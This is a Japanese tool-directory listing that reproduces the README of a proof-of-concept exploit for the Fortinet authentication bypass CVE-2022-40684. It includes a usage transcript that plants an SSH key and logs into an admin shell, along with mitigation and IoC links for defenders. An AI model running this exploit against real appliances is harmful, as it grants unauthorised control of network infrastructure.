Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/horizon3ai/cve-2022-40684
エクスプロイトフレームワーク脆弱性分析エクスプロイトペネトレーションテスト認証レッドチーミング
GitHubhorizon3ai/cve-2022-40684

CVE-2022-40684

Fortinet FortiOS、FortiProxy、およびFortiSwitchManagerに影響するCVE-2022-40684の概念実証エクスプロイト

リポジトリを見る
3589043年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-40684

Fortinet FortiOS、FortiProxy、FortiSwitchManager アプライアンスに影響を与える CVE-2022-40684 の POC

技術分析

本脆弱性の技術的根本原因分析は、私たちのブログでご覧いただけます: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684

侵害指標(IoC)

Fortinet ログを分析して侵害指標を特定し、詳細なログを有効にする方法については、IoCブログをご覧ください: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/

概要

この POC は、認証バイパスの脆弱性を悪用して、指定されたユーザーに SSH キーを設定します。

使用法

root@kitploit:~
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.

緩和策

最新バージョンにアップデートするか、Fortinet PSIRT 内の指示に従って緩和してください。

  • https://www.fortiguard.com/psirt/FG-IR-22-377

最新のセキュリティ研究については、Horizon3.ai Attack Team をTwitterでフォローしてください:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

免責事項

本ソフトウェアは、学術研究と効果的な防御技術の開発を唯一の目的として作成されており、明示的に許可された場合を除き、システムへの攻撃に使用することを意図していません。プロジェクトのメンテナーは、本ソフトウェアの誤用に関して一切の責任を負いません。責任を持って使用してください。

ツールをダウンロード